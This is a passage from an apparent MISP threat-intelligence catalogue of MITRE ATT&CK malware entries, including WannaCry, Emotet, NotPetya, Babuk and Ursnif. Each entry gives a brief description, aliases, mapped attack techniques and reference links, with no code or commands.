https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf
https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
https://digital.nhs.uk/cyber-alerts/2020/cc-3633

ECCENTRICBANDWAGON - S0593

[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool—with keylogging and screen capture functionality—used for information gathering on compromised systems.(Citation: CISA EB Aug 2020)

The tag is: misp-galaxy:mitre-malware="ECCENTRICBANDWAGON - S0593"

ECCENTRICBANDWAGON - S0593 is also known as:

ECCENTRICBANDWAGON

View relationships graph

ECCENTRICBANDWAGON - S0593 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 5063. Table References
Links
https://attack.mitre.org/software/S0593
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a

LightNeuron - S0395

[LightNeuron](https://attack.mitre.org/software/S0395) is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. [LightNeuron](https://attack.mitre.org/software/S0395) has been used by [Turla](https://attack.mitre.org/groups/G0010) to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of [LightNeuron](https://attack.mitre.org/software/S0395) exists.(Citation: ESET LightNeuron May 2019)

The tag is: misp-galaxy:mitre-malware="LightNeuron - S0395"

LightNeuron - S0395 is also known as:

LightNeuron

View relationships graph

LightNeuron - S0395 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 5064. Table References
Links
https://attack.mitre.org/software/S0395
https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf

WannaCry - S0366

[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)

The tag is: misp-galaxy:mitre-malware="WannaCry - S0366"

WannaCry - S0366 is also known as:

WannaCry
WanaCry
WanaCrypt
WanaCrypt0r
WCry

View relationships graph

WannaCry - S0366 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 5065. Table References
Links
https://attack.mitre.org/software/S0366
https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/
https://www.us-cert.gov/ncas/alerts/TA17-132A
https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4
https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html
https://www.secureworks.com/research/wcry-ransomware-analysis

VaporRage - S0636

[VaporRage](https://attack.mitre.org/software/S0636) is a shellcode downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)

The tag is: misp-galaxy:mitre-malware="VaporRage - S0636"

VaporRage - S0636 is also known as:

VaporRage

View relationships graph

VaporRage - S0636 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 5066. Table References
Links
https://attack.mitre.org/software/S0636
https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

Emotet - S0367

[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and [IcedID](https://attack.mitre.org/software/S0483). Emotet first emerged in June 2014 and has been primarily used to target the banking sector. (Citation: Trend Micro Banking Malware Jan 2019)

The tag is: misp-galaxy:mitre-malware="Emotet - S0367"

Emotet - S0367 is also known as:

Emotet
Geodo

View relationships graph

Emotet - S0367 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 5067. Table References
Links
https://attack.mitre.org/software/S0367
https://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/
https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/
https://www.cisecurity.org/blog/emotet-changes-ttp-and-arrives-in-united-states/
https://support.malwarebytes.com/docs/DOC-2295
https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor
https://www.us-cert.gov/ncas/alerts/TA18-201A
https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/
https://www.secureworks.com/blog/lazy-passwords-become-rocket-fuel-for-emotet-smb-spreader
https://blog.talosintelligence.com/2019/01/return-of-emotet.html
https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf
https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/
https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html
https://redcanary.com/blog/stopping-emotet-before-it-moves-laterally/

HOPLIGHT - S0376

[HOPLIGHT](https://attack.mitre.org/software/S0376) is a backdoor Trojan that has reportedly been used by the North Korean government.(Citation: US-CERT HOPLIGHT Apr 2019)

The tag is: misp-galaxy:mitre-malware="HOPLIGHT - S0376"

HOPLIGHT - S0376 is also known as:

HOPLIGHT

View relationships graph

HOPLIGHT - S0376 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 5068. Table References
Links
https://attack.mitre.org/software/S0376
https://www.us-cert.gov/ncas/analysis-reports/AR19-100A

NativeZone - S0637

[NativeZone](https://attack.mitre.org/software/S0637) is the name given collectively to disposable custom [Cobalt Strike](https://attack.mitre.org/software/S0154) loaders used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)(Citation: SentinelOne NobleBaron June 2021)

The tag is: misp-galaxy:mitre-malware="NativeZone - S0637"

NativeZone - S0637 is also known as:

NativeZone

View relationships graph

NativeZone - S0637 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 5069. Table References
Links
https://attack.mitre.org/software/S0637
https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/
https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/

Babuk - S0638

[Babuk](https://attack.mitre.org/software/S0638) is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of [Babuk](https://attack.mitre.org/software/S0638) employ a "Big Game Hunting" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: CyberScoop Babuk February 2021)

The tag is: misp-galaxy:mitre-malware="Babuk - S0638"

Babuk - S0638 is also known as:

Babuk
Babyk
Vasa Locker

View relationships graph

Babuk - S0638 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 5070. Table References
Links
https://attack.mitre.org/software/S0638
https://www.sogeti.com/globalassets/reports/cybersecchronicles_-babuk.pdf[https://www.sogeti.com/globalassets/reports/cybersecchronicles-_babuk.pdf]
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf
https://www.cyberscoop.com/babuk-ransomware-serco-attack/
https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html

NotPetya - S0368

[NotPetya](https://attack.mitre.org/software/S0368) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://attack.mitre.org/software/S0368) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)

The tag is: misp-galaxy:mitre-malware="NotPetya - S0368"

NotPetya - S0368 is also known as:

NotPetya
ExPetr
Diskcoder.C
GoldenEye
Petrwrap
Nyetya

View relationships graph

NotPetya - S0368 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

Table 5071. Table References
Links
https://attack.mitre.org/software/S0368
https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
https://www.us-cert.gov/ncas/alerts/TA17-181A
https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/
https://www.justice.gov/opa/press-release/file/1328521/download

Ursnif - S0386

[Ursnif](https://attack.mitre.org/software/S0386) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)s, and malicious links.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016) [Ursnif](https://attack.mitre.org/software/S0386) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.(Citation: TrendMicro Ursnif Mar 2015)

The tag is: misp-galaxy:mitre-malware="Ursnif - S0386"

Ursnif - S0386 is also known as:

Ursnif
Gozi-ISFB
PE_URSNIF
Dreambot

View relationships graph

Ursnif - S0386 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Thread Local Storage - T1055.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 5072. Table References
Links
https://attack.mitre.org/software/S0386
https://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnif
https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality
https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992
https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html

EvilBunny - S0396

[EvilBunny](https://attack.mitre.org/software/S0396) is a C++ malware sample observed since 2011 that was designed to be a execution platform for Lua scripts.(Citation: Cyphort EvilBunny Dec 2014)

The tag is: misp-galaxy:mitre-malware="EvilBunny - S0396"

EvilBunny - S0396 is also known as:

EvilBunny

View relationships graph

EvilBunny - S0396 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
